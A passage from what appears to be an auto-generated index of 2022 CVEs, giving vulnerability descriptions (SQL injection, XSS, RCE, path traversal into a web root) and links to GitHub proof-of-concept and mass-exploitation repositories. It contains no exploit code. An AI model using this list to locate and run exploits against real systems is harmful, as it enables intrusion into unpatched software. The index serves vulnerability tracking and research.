CVE-2022-27927 (2022-04-19) + +A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter. + + +- [erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated) + +### CVE-2022-27997 +- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997) + +### CVE-2022-28077 (2022-05-11) + +Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['s'] parameter. + + +- [bigzooooz/CVE-2022-28077](https://github.com/bigzooooz/CVE-2022-28077) + +### CVE-2022-28078 (2022-05-11) + +Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['page'] parameter. + + +- [bigzooooz/CVE-2022-28078](https://github.com/bigzooooz/CVE-2022-28078) + +### CVE-2022-28079 (2022-05-05) + +College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. + + +- [erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated](https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated) + +### CVE-2022-28080 (2022-05-05) + +Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter. + + +- [erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated](https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated) + +### CVE-2022-28099 (2022-05-04) + +Poultry Farm Management System v1.0 was discovered to contain a SQL injection vulnerability via the Item parameter at /farm/store.php. + + +- [IbrahimEkimIsik/CVE-2022-28099](https://github.com/IbrahimEkimIsik/CVE-2022-28099) + +### CVE-2022-28113 (2022-04-15) + +An issue in upload.csp of FANTEC GmbH MWiD25-DS Firmware v2.000.030 allows attackers to write files and reset the user passwords without having a valid session cookie. + + +- [code-byter/CVE-2022-28113](https://github.com/code-byter/CVE-2022-28113) + +### CVE-2022-28117 (2022-04-28) + +A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter. + + +- [cheshireca7/CVE-2022-28117](https://github.com/cheshireca7/CVE-2022-28117) +- [kimstars/POC-CVE-2022-28117](https://github.com/kimstars/POC-CVE-2022-28117) + +### CVE-2022-28118 (2022-05-03) + +SiteServer CMS v7.x allows attackers to execute arbitrary code via a crafted plug-in. + + +- [Richard-Tang/SSCMS-PluginShell](https://github.com/Richard-Tang/SSCMS-PluginShell) + +### CVE-2022-28132 (-) + +The T-Soft E-Commerce 4 web application is susceptible to SQL injection (SQLi) attacks when authenticated as an admin or privileged user. This vulnerability allows attackers to access and manipulate the database through crafted requests. By exploiting this flaw, attackers can bypass authentication mechanisms, view sensitive information stored in the database, and potentially exfiltrate data. + + +- [alpernae/CVE-2022-28132](https://github.com/alpernae/CVE-2022-28132) + +### CVE-2022-28171 (2022-06-27) + +The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerability. Due to the insufficient input validation, attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device. + + +- [NyaMeeEain/CVE-2022-28171-POC](https://github.com/NyaMeeEain/CVE-2022-28171-POC) +- [aengussong/hikvision_probe](https://github.com/aengussong/hikvision_probe) + +### CVE-2022-28219 (2022-04-05) + +Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution. + + +- [horizon3ai/CVE-2022-28219](https://github.com/horizon3ai/CVE-2022-28219) +- [rbowes-r7/manageengine-auditad-cve-2022-28219](https://github.com/rbowes-r7/manageengine-auditad-cve-2022-28219) +- [aeifkz/CVE-2022-28219-Like](https://github.com/aeifkz/CVE-2022-28219-Like) + +### CVE-2022-28281 (2022-12-22) + +If a compromised content process sent an unexpected number of WebAuthN Extensions in a Register command to the parent process, an out of bounds write would have occurred leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8. + + +- [0vercl0k/CVE-2022-28281](https://github.com/0vercl0k/CVE-2022-28281) + +### CVE-2022-28282 (2022-12-22) + +By using a link with <code>rel="localization"</code> a use-after-free could have been triggered by destroying an object during JavaScript execution and then referencing the object through a freed pointer, leading to a potential exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8. + + +- [bb33bb/CVE-2022-28282-firefox](https://github.com/bb33bb/CVE-2022-28282-firefox) + +### CVE-2022-28346 (2022-04-12) + +An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs. + + +- [YouGina/CVE-2022-28346](https://github.com/YouGina/CVE-2022-28346) +- [DeEpinGh0st/CVE-2022-28346](https://github.com/DeEpinGh0st/CVE-2022-28346) +- [ahsentekd/CVE-2022-28346](https://github.com/ahsentekd/CVE-2022-28346) +- [vincentinttsh/CVE-2022-28346](https://github.com/vincentinttsh/CVE-2022-28346) +- [kamal-marouane/CVE-2022-28346](https://github.com/kamal-marouane/CVE-2022-28346) + +### CVE-2022-28368 (2022-04-03) + +Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file). + + +- [rvizx/CVE-2022-28368](https://github.com/rvizx/CVE-2022-28368) +- [That-Guy-Steve/CVE-2022-28368-handler](https://github.com/That-Guy-Steve/CVE-2022-28368-handler) +- [Henryisnotavailable/Dompdf-Exploit-RCE](https://github.com/Henryisnotavailable/Dompdf-Exploit-RCE) + +### CVE-2022-28381 (2022-04-03) + +Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932. + + +- [DShankle/CVE-2022-28381_PoC](https://github.com/DShankle/CVE-2022-28381_PoC) + +### CVE-2022-28452 (2022-04-29) + +Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection. + + +- [YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL](https://github.com/YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL) + +### CVE-2022-28454 (2022-04-28) + +Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS). + + +- [YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-](https://github.com/YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-) + +### CVE-2022-28508 (2022-05-04) + +An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field. + + +- [YavuzSahbaz/CVE-2022-28508](https://github.com/YavuzSahbaz/CVE-2022-28508) + +### CVE-2022-28590 (2022-05-03) + +A Remote Code Execution (RCE) vulnerability exists in Pixelimity 1.0 via admin/admin-ajax.php?action=install_theme. + + +- [jcarabantes/CVE-2022-28590](https://github.com/jcarabantes/CVE-2022-28590) + +### CVE-2022-28598 (2022-08-22) + +Frappe ERPNext 12.29.0 is vulnerable to XSS where the software does not neutralize or incorrectly neutralize user-controllable input before it is placed in output that is used as a web page that is served to other users. + + +- [patrickdeanramos/CVE-2022-28598](https://github.com/patrickdeanramos/CVE-2022-28598) + +### CVE-2022-28601 (2022-05-10) + +A Two-Factor Authentication (2FA) bypass vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor allows remote attackers to overwrite the phone number used for confirmation via the profile.php file. Therefore, allowing them to bypass the phone verification mechanism. + + +- [FlaviuPopescu/CVE-2022-28601](https://github.com/FlaviuPopescu/CVE-2022-28601) + +### CVE-2022-28672 (2022-07-18) + +This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.2.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16640. + + +- [hacksysteam/CVE-2022-28672](https://github.com/hacksysteam/CVE-2022-28672) +- [fastmo/CVE-2022-28672](https://github.com/fastmo/CVE-2022-28672) + +### CVE-2022-28943 +- [zhefox/CVE-2022-28943](https://github.com/zhefox/CVE-2022-28943) + +### CVE-2022-28944 (2022-05-23) + +Certain EMCO Software products are affected by: CWE-494: Download of Code Without Integrity Check. This affects MSI Package Builder for Windows 9.1.4 and Remote Installer for Windows 6.0.13 and Ping Monitor for Windows 8.0.18 and Remote Shutdown for Windows 7.2.2 and WakeOnLan 2.0.8 and Network Inventory for Windows 5.8.22 and Network Software Scanner for Windows 2.0.8 and UnLock IT for Windows 6.1.1. The impact is: execute arbitrary code (remote). The component is: Updater. The attack vector is: To exploit this vulnerability, a user must trigger an update of an affected installation of EMCO Software. ¶¶ Multiple products from EMCO Software are affected by a remote code execution vulnerability during the update process. + + +- [gerr-re/cve-2022-28944](https://github.com/gerr-re/cve-2022-28944) + +### CVE-2022-28986 (2022-05-10) + +LMS Doctor Simple 2 Factor Authentication Plugin For Moodle Affected: 2021072900 has an Insecure direct object references (IDOR) vulnerability, which allows remote attackers to update sensitive records such as email, password and phone number of other user accounts. + + +- [FlaviuPopescu/CVE-2022-28986](https://github.com/FlaviuPopescu/CVE-2022-28986) + +### CVE-2022-29004 (2022-05-23) + +Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php. + + +- [sudoninja-noob/CVE-2022-29004](https://github.com/sudoninja-noob/CVE-2022-29004) + +### CVE-2022-29005 (2022-05-23) + +Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters. + + +- [sudoninja-noob/CVE-2022-29005](https://github.com/sudoninja-noob/CVE-2022-29005) + +### CVE-2022-29006 (2022-05-11) + +Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication. + + +- [sudoninja-noob/CVE-2022-29006](https://github.com/sudoninja-noob/CVE-2022-29006) + +### CVE-2022-29007 (2022-05-11) + +Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication. + + +- [sudoninja-noob/CVE-2022-29007](https://github.com/sudoninja-noob/CVE-2022-29007) + +### CVE-2022-29008 (2022-05-11) + +An insecure direct object reference (IDOR) vulnerability in the viewid parameter of Bus Pass Management System v1.0 allows attackers to access sensitive information. + + +- [sudoninja-noob/CVE-2022-29008](https://github.com/sudoninja-noob/CVE-2022-29008) + +### CVE-2022-29009 (2022-05-11) + +Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication. + + +- [sudoninja-noob/CVE-2022-29009](https://github.com/sudoninja-noob/CVE-2022-29009) + +### CVE-2022-29063 (2022-09-02) + +The Solr plugin of Apache OFBiz is configured by default to automatically make a RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade to at least 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12646. + + +- [mbadanoiu/CVE-2022-29063](https://github.com/mbadanoiu/CVE-2022-29063) + +### CVE-2022-29072 (2022-04-15) + +7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. NOTE: multiple third parties have reported that no privilege escalation can occur + + +- [kagancapar/CVE-2022-29072](https://github.com/kagancapar/CVE-2022-29072) +- [tiktb8/CVE-2022-29072](https://github.com/tiktb8/CVE-2022-29072) +- [sentinelblue/CVE-2022-29072](https://github.com/sentinelblue/CVE-2022-29072) +- [Phantomiman/7-Zip.chm-Mitigation](https://github.com/Phantomiman/7-Zip.chm-Mitigation) +- [rasan2001/CVE-2022-29072](https://github.com/rasan2001/CVE-2022-29072) + +### CVE-2022-29078 (2022-04-25) + +The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation). + + +- [miko550/CVE-2022-29078](https://github.com/miko550/CVE-2022-29078) +- [liam-star-black-master/expluatation_CVE-2022-29078](https://github.com/liam-star-black-master/expluatation_CVE-2022-29078) +- [l0n3m4n/CVE-2022-29078](https://github.com/l0n3m4n/CVE-2022-29078) + +### CVE-2022-29154 (2022-08-02) + +An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary files inside the directories of connecting peers. The server chooses which files/directories are sent to the client. However, the rsync client performs insufficient validation of file names. A malicious rsync server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the rsync client target directory and subdirectories (for example, overwrite the .ssh/authorized_keys file). + + +- [EgeBalci/CVE-2022-29154](https://github.com/EgeBalci/CVE-2022-29154) + +### CVE-2022-29170 (2022-05-20) + +Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5.16 and 8.5.3 allows someone to bypass these security configurations if a malicious datasource (running on an allowed host) returns an HTTP redirect to a forbidden host. The vulnerability only impacts Grafana Enterprise when the Request security allow list is used and there is a possibility to add a custom datasource to Grafana which returns HTTP redirects. In this scenario, Grafana would blindly follow the redirects and potentially give secure information to the clients. Grafana Cloud is not impacted by this vulnerability. Versions 7.5.16 and 8.5.3 contain a patch for this issue. There are currently no known workarounds. + + +- [yijikeji/CVE-2022-29170](https://github.com/yijikeji/CVE-2022-29170) + +### CVE-2022-29221 (2022-05-24) + +Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds. + + +- [sbani/CVE-2022-29221-PoC](https://github.com/sbani/CVE-2022-29221-PoC) + +### CVE-2022-29303 (2022-05-12) + +SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + + +- [Chocapikk/CVE-2022-29303](https://github.com/Chocapikk/CVE-2022-29303) +- [1f3lse/CVE-2022-29303](https://github.com/1f3lse/CVE-2022-29303) + +### CVE-2022-29337 (2022-05-24) + +C-DATA FD702XW-X-R430 v2.1.13_X001 was discovered to contain a command injection vulnerability via the va_cmd parameter in formlanipv6. This vulnerability allows attackers to execute arbitrary commands via a crafted HTTP request. + + +- [exploitwritter/CVE-2022-29337](https://github.com/exploitwritter/CVE-2022-29337) + +### CVE-2022-29359 (2022-05-24) + +A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter. + + +- [ZSECURE/CVE-2022-29359](https://github.com/ZSECURE/CVE-2022-29359) + +### CVE-2022-29361 (2022-05-24) + +Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body. NOTE: the vendor's position is that this behavior can only occur in unsupported configurations involving development mode and an HTTP server from outside the Werkzeug project + + +- [kevin-mizu/Werkzeug-CVE-2022-29361-PoC](https://github.com/kevin-mizu/Werkzeug-CVE-2022-29361-PoC) +- [l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS](https://github.com/l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS) + +### CVE-2022-29380 (2022-05-25) + +Academy-LMS v4.3 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the SEO panel. + + +- [OpenXP-Research/CVE-2022-29380](https://github.com/OpenXP-Research/CVE-2022-29380) + +### CVE-2022-29383 (2022-05-13) + +NETGEAR ProSafe SSL VPN firmware FVS336Gv2 and FVS336Gv3 was discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + + +- [badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383) +- [cxaqhq/netgear-to-CVE-2022-29383](https://github.com/cxaqhq/netgear-to-CVE-2022-29383) + +### CVE-2022-29455 (2022-06-13) + +DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions. + + +- [GULL2100/Wordpress_xss-CVE-2022-29455](https://github.com/GULL2100/Wordpress_xss-CVE-2022-29455) +- [akhilkoradiya/CVE-2022-29455](https://github.com/akhilkoradiya/CVE-2022-29455) +- [yaudahbanh/CVE-2022-29455](https://github.com/yaudahbanh/CVE-2022-29455) +- [0xc4t/CVE-2022-29455](https://github.com/0xc4t/CVE-2022-29455) +- [tucommenceapousser/CVE-2022-29455](https://github.com/tucommenceapousser/CVE-2022-29455) +- [tucommenceapousser/CVE-2022-29455-mass](https://github.com/tucommenceapousser/CVE-2022-29455-mass) + +### CVE-2022-29464 (2022-04-18) + +Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0. + + +- [hakivvi/CVE-2022-29464](https://github.com/hakivvi/CVE-2022-29464) +- [tufanturhan/wso2-rce-cve-2022-29464](https://github.com/tufanturhan/wso2-rce-cve-2022-29464) +- [mr-r3bot/WSO2-CVE-2022-29464](https://github.com/mr-r3bot/WSO2-CVE-2022-29464) +- [Lidong-io/cve-2022-29464](https://github.com/Lidong-io/cve-2022-29464) +- [hev0x/CVE-2022-29464](https://github.com/hev0x/CVE-2022-29464) +- [gpiechnik2/nmap-CVE-2022-29464](https://github.com/gpiechnik2/nmap-CVE-2022-29464) +- [0xAgun/CVE-2022-29464](https://github.com/0xAgun/CVE-2022-29464) +- [oppsec/WSOB](https://github.com/oppsec/WSOB) +- [n3rdh4x0r/CVE-2022-29464](https://github.com/n3rdh4x0r/CVE-2022-29464) +- [lowkey0808/cve-2022-29464](https://github.com/lowkey0808/cve-2022-29464) +- [superzerosec/CVE-2022-29464](https://github.com/superzerosec/CVE-2022-29464) +- [axin2019/CVE-2022-29464](https://github.com/axin2019/CVE-2022-29464) +- [LinJacck/CVE-2022-29464](https://github.com/LinJacck/CVE-2022-29464) +- [Inplex-sys/CVE-2022-29464-loader](https://github.com/Inplex-sys/CVE-2022-29464-loader) +- [Chocapikk/CVE-2022-29464](https://github.com/Chocapikk/CVE-2022-29464) +- [jimidk/Better-CVE-2022-29464](https://github.com/jimidk/Better-CVE-2022-29464) +- [electr0lulz/Mass-exploit-CVE-2022-29464](https://github.com/electr0lulz/Mass-exploit-CVE-2022-29464) +- [xinghonghaoyue/CVE-2022-29464](https://github.com/xinghonghaoyue/CVE-2022-29464) +- [Pasch0/WSO2RCE](https://github.com/Pasch0/WSO2RCE) +- [r4x0r1337/-CVE-2022-29464](https://github.com/r4x0r1337/-CVE-2022-29464) +- [amit-pathak009/CVE-2022-29464](https://github.com/amit-pathak009/CVE-2022-29464) +- [amit-pathak009/CVE-2022-29464-mass](https://github.com/amit-pathak009/CVE-2022-29464-mass) +- [hupe1980/CVE-2022-29464](https://github.com/hupe1980/CVE-2022-29464) +- [gbrsh/CVE-2022-29464](https://github.com/gbrsh/CVE-2022-29464) +- [devengpk/CVE-2022-29464](https://github.com/devengpk/CVE-2022-29464) +- [ThatNotEasy/CVE-2022-29464](https://github.com/ThatNotEasy/CVE-2022-29464) +- [Pushkarup/CVE-2022-29464](https://github.com/Pushkarup/CVE-2022-29464) +- [SynixCyberCrimeMy/CVE-2022-29464](https://github.com/SynixCyberCrimeMy/CVE-2022-29464) +- [cc3305/CVE-2022-29464](https://github.com/cc3305/CVE-2022-29464) + +### CVE-2022-29465 (2022-08-05) + +An out-of-bounds write vulnerability exists in the PSD Header processing memory allocation functionality of Accusoft ImageGear 20.0. A specially-crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability. + + +- [badguy233/CVE-2022-29465](https://github.com/badguy233/CVE-2022-29465) + +### CVE-2022-29469 +- [S4muraiMelayu1337/CVE-2022-29469](https://github.com/S4muraiMelayu1337/CVE-2022-29469) + +### CVE-2022-29548 (2022-04-21) + +A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + + +- [cxosmo/CVE-2022-29548](https://github.com/cxosmo/CVE-2022-29548) + +### CVE-2022-29551 +- [ComparedArray/printix-CVE-2022-29551](https://github.com/ComparedArray/printix-CVE-2022-29551) + +### CVE-2022-29552 +- [ComparedArray/printix-CVE-2022-29552](https://github.com/ComparedArray/printix-CVE-2022-29552) + +### CVE-2022-29553 +- [ComparedArray/printix-CVE-2022-29553](https://github.com/ComparedArray/printix-CVE-2022-29553) + +### CVE-2022-29554 +- [ComparedArray/printix-CVE-2022-29554](https://github.com/ComparedArray/printix-CVE-2022-29554) + +### CVE-2022-29581 (2022-05-17) + +Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions. + + +- [Nidhi77777/linux-4.19.72_CVE-2022-29581](https://github.com/Nidhi77777/linux-4.19.72_CVE-2022-29581) +- [nidhihcl/linux-4.19.72_CVE-2022-29581](https://github.com/nidhihcl/linux-4.19.72_CVE-2022-29581) + +### CVE-2022-29582 (2022-04-22) + +In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently. + + +- [Ruia-ruia/CVE-2022-29582-Exploit](https://github.com/Ruia-ruia/CVE-2022-29582-Exploit) + +### CVE-2022-29593 (2022-07-14) + +relay_cgi.cgi on Dingtian DT-R002 2CH relay devices with firmware 3.1.276A allows an attacker to replay HTTP post requests without the need for authentication or a valid signed/authorized request. + + +- [9lyph/CVE-2022-29593](https://github.com/9lyph/CVE-2022-29593) + +### CVE-2022-29597 (2022-06-02) + +Solutions Atlantic Regulatory Reporting System (RRS) v500 is vulnerable to Local File Inclusion (LFI). Any authenticated user has the ability to reference internal system files within requests made to the RRSWeb/maint/ShowDocument/ShowDocument.aspx page. The server will successfully respond with the file contents of the internal system file requested. This ability could allow for adversaries to extract sensitive data and/or files from the underlying file system, gain knowledge about the internal workings of the system, or access source code of the application. + + +- [TheGetch/CVE-2022-29597](https://github.com/TheGetch/CVE-2022-29597) + +### CVE-2022-29598 (2022-05-27) + +Solutions Atlantic Regulatory Reporting System (RRS) v500 is vulnerable to an reflected Cross-Site Scripting (XSS) vulnerability via RRSWeb/maint/ShowDocument/ShowDocument.aspx . + + +- [TheGetch/CVE-2022-29598](https://github.com/TheGetch/CVE-2022-29598) + +### CVE-2022-29622 (2022-05-16) + +An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled. Strapi does not consider this to be a valid vulnerability. + + +- [keymandll/CVE-2022-29622](https://github.com/keymandll/CVE-2022-29622) + +### CVE-2022-29778 (2022-06-03) + +D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php + + +- [TyeYeah/DIR-890L-1.20-RCE](https://github.com/TyeYeah/DIR-890L-1.20-RCE) + +### CVE-2022-29856 (2022-04-29) + +A hardcoded cryptographic key in Automation360 22 allows an attacker to decrypt exported RPA packages. + + +- [Flo451/CVE-2022-29856-PoC](https://github.com/Flo451/CVE-2022-29856-PoC) + +### CVE-2022-29885 (2022-05-12) + +The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks. + + +- [quynhlab/CVE-2022-29885](https://github.com/quynhlab/CVE-2022-29885) +- [iveresk/CVE-2022-29885](https://github.com/iveresk/CVE-2022-29885) + +### CVE-2022-29932 (2022-05-11) + +The HTTP Server in PRIMEUR SPAZIO 2.5.1.954 (File Transfer) allows an unauthenticated attacker to obtain sensitive data (related to the content of transferred files) via a crafted HTTP request. + + +- [Off3nS3c/CVE-2022-29932](https://github.com/Off3nS3c/CVE-2022-29932) + +### CVE-2022-29968 (2022-05-02) + +An issue was discovered in the Linux kernel through 5.17.5. io_rw_init_file in fs/io_uring.c lacks initialization of kiocb->private. + + +- [jprx/CVE-2022-29968](https://github.com/jprx/CVE-2022-29968) + +### CVE-2022-30006 +- [ComparedArray/printix-CVE-2022-30006](https://github.com/ComparedArray/printix-CVE-2022-30006) + +### CVE-2022-30023 (2022-06-16) + +Tenda ONT GPON AC1200 Dual band WiFi HG9 v1.0.1 is vulnerable to Command Injection via the Ping function. + + +- [Haniwa0x01/CVE-2022-30023](https://github.com/Haniwa0x01/CVE-2022-30023) + +### CVE-2022-30040 (2022-05-11) + +Tenda AX1803 v1.0.0.1_2890 is vulnerable to Buffer Overflow. The vulnerability lies in rootfs_ In / goform / setsystimecfg of / bin / tdhttpd in ubif file system, attackers can access http://ip/goform/SetSysTimeCfg, and by setting the ntpserve parameter, the stack buffer overflow can be caused to achieve the effect of router denial of service. + + +- [Le1a/CVE-2022-30040](https://github.com/Le1a/CVE-2022-30040) + +### CVE-2022-30075 (2022-06-09) + +In TP-Link Router AX50 firmware 210730 and older, import of a malicious backup file via web interface can lead to remote code execution due to improper validation. + + +- [aaronsvk/CVE-2022-30075](https://github.com/aaronsvk/CVE-2022-30075) +- [SAJIDAMINE/CVE-2022-30075](https://github.com/SAJIDAMINE/CVE-2022-30075) +- [M4fiaB0y/CVE-2022-30075](https://github.com/M4fiaB0y/CVE-2022-30075) + +### CVE-2022-30114 (2023-05-19) + +A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS. + + +- [str0ng4le/CVE-2022-30114](https://github.com/str0ng4le/CVE-2022-30114) + +### CVE-2022-30129 (2022-05-10) + +Visual Studio Code Remote Code Execution Vulnerability + + +- [RoccoPearce/CVE-2022-30129](https://github.com/RoccoPearce/CVE-2022-30129) + +### CVE-2022-30136 (2022-06-15) + +Windows Network File System Remote Code Execution Vulnerability + + +- [fortra/CVE-2022-30136](https://github.com/fortra/CVE-2022-30136) +- [AXRoux/CVE-2022-30136](https://github.com/AXRoux/CVE-2022-30136) + +### CVE-2022-30190 (2022-06-01) + +A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.\nPlease see the MSRC Blog Entry for important information about steps you can take to protect your system from this vulnerability.\n + + +- [JMousqueton/PoC-CVE-2022-30190](https://github.com/JMousqueton/PoC-CVE-2022-30190) +- [zkl21hoang/msdt-follina-office-rce](https://github.com/zkl21hoang/msdt-follina-office-rce) +- [onecloudemoji/CVE-2022-30190](https://github.com/onecloudemoji/CVE-2022-30190) +- [2867a0/CVE-2022-30190](https://github.com/2867a0/CVE-2022-30190) +- [doocop/CVE-2022-30190](https://github.com/doocop/CVE-2022-30190) +- [archanchoudhury/MSDT_CVE-2022-30190](https://github.com/archanchoudhury/MSDT_CVE-2022-30190) +- [rickhenderson/cve-2022-30190](https://github.com/rickhenderson/cve-2022-30190) +- [DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup](https://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup) +- [kdk2933/msdt-CVE-2022-30190](https://github.com/kdk2933/msdt-CVE-2022-30190) +- 